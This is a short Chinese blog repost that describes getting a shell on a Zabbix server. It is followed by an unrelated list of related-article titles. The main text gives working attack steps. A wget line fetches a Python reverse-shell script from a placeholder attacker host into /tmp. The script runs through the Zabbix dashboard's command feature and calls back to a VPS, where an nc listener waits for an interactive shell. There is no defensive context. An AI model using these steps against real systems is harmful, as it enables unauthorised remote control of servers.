wget http://xxxxxxx:8888/back.py -O  /tmp/1.py  写入python反弹马

反弹到vps

python /tmp/back.py IP port              执行python反弹马

仪表盘执行命令

vps上监听
nc -l -vv -p8080
得交互shell

之后慢慢玩

转载于:https://www.cnblogs.com/lly-lly/p/5390894.html

一次zabbix的渗透相关推荐

  1. 黑客渗透入门教程 第一课:粗暴的端口扫描

    很多人想学黑客知识,却不知如何入门,网上的教程也太繁琐,小白看了也头疼,那还是我来写黑客系列入门教程吧,跟着我做,你能黑客入门的. 端口扫描是指发送一组扫描消息,了解其提供的计算机网络服务类型(这些网 ...

  2. 渗透中寻找突破口的那些事

    HRay · 2014/09/02 10:28 0x00 寻找目标 在自己日常检测中以及观察他人检测思路发现前期收集信息具有很关键的作用,很多时候不需要对某种漏洞有很深的研究,如果前期收集了足够多的目 ...

  3. 渗透知识-内网渗透(详细版本)

    1. 内网安全检查/渗透介绍 1.1 攻击思路 有2种思路: 攻击外网服务器,获取外网服务器的权限,接着利用入侵成功的外网服务器作为跳板,攻击内网其他服务器,最后获得敏感数据,并将数据传递到攻击者,看 ...

  4. 第一章:渗透测试之信息搜集

    1.收集域名信息 (1)Whois查询 (2)备案信息查询 2.收集敏感信息 3.收集子域名信息 4.收集常用端口信息 5.指纹识别 6.查找真实IP 7.收集敏感目录文件 8.社会工程学 1.收集域 ...

  5. 渗透测试入门8之端口渗透

    渗透测试入门8之端口渗透 端口扫描 1.端口的指纹信息(版本信息) 2.端口所对应运行的服务 3.常见的默认端口号 4.尝试弱口令 端口爆破 hydra 端口弱口令 NTScan Hscan 自写脚本 ...

  6. 渗透测试入门2之进入内网

    渗透测试入门2之进入内网 1. 基于企业弱账号漏洞 VPN(通过邮箱,密码爆破,社工等途径获取VPN) 企业相关运维系统(zabbix等) 2. 基于系统漏洞进入 Metasploit(漏洞利用框架) ...

  7. 只用一个WiFi,渗透进企业全部内网

    近年来,黑客通过企业无线网络发起的企业内网渗透事件频发,在某漏洞平台检索时发现仅2015年便发生了数十起知名企业因WiFi相关安全问题导致内网被入侵的事件,对企业造成了十分恶劣的影响. 到了2016年 ...

  8. 渗透测试之信息搜集总结

    在渗透测试的第一步,就是进行信息搜集,在做渗透测试时我们越了解目标,测试的工作就越容易.只要是与网站相关的的信息,都要竟可能多的去搜集. 目录 收集域名信息 whois查询 备案信息查询 收集敏感信息 ...

  9. 渗透测试如何学习? (*╹▽╹*) 信息收集 ~ 其一

    文章目录 简介 本博客学习基础 收集信息简介 收集那些信息 信息收集一(域名信息收集) 收集目标相关子域名 被动方式收集信息 方法一:Google语法 方法二:使用第三方网站接口查询 方法三:使用网络 ...

最新文章

  1. AI一分钟 | 妈呀!连地铁都开始无人驾驶了,飞机还远吗;北京无人驾驶新规出台,终于知道李彦宏该不该被罚了(12月19日)
  2. 一条正确的Java职业生涯规划,从理论到实践!
  3. Mysql Workbench导出数据库时报 Unknown table ‘column_statistics‘ in information_schema (1109)
  4. CentOS 7破解root密码
  5. 关于'java' 不是内部或外部命令,也不是可运行的程序 或批处理文件 和 错误: 找不到或无法加载主类 helloworld的问题...
  6. mysql视图存储_Mysql 视图、存储过程以及权限控制
  7. linux mysql e_Linux下安装mysql
  8. jQuery1.6性能评测
  9. golang 的 tag
  10. CSDN 在线峰会——揭晓阿里云核心技术竞争力
  11. 关于垂直列行值转成水平行值及多列值转合并成单列值
  12. dude由于目标计算机,The Dude的教程
  13. matlab opnet,OPNET中设计网络 MATLAB
  14. 你知道视频去水印的方法有哪些吗?分享2个实用的去水印方法
  15. 计算机内 云盘图标,如何关闭我的电脑中百度网盘图标
  16. 计算机考试音乐怎么粘贴,用手机或电脑怎样剪切和接音乐?
  17. Altium Designer 10 下载和安装破解教程
  18. UE4材质UV纹理扭曲效果
  19. 期刊以及会议的CCF类别查询方法
  20. 查看电脑重启日志_我怀疑有人动了我的电脑……

热门文章

  1. mysql的索引类型以及优缺点
  2. 【迁移学习(Transfer L)全面指南】零次学习(Zero-Shot Learning)入门
  3. python【力扣LeetCode算法题库】876- 链表的中间结点
  4. 【django轻量级框架】云端系统之Django框架进阶
  5. python【蓝桥杯vip练习题库】ADV-235阶乘差
  6. linux script录屏文件夹,linux下录屏和回放工具script和scriptreplay
  7. python实训报告pygame_20181218 实验四《Python程序设计》实验报告
  8. java shell排序算法_【算法】8种排序算法(Java)
  9. 网络推广外包浅析当下网站优化处于健康状态有利于网络推广外包
  10. 以下linux进程内存空间中按低地址,Linux 内核开发 - 进程空间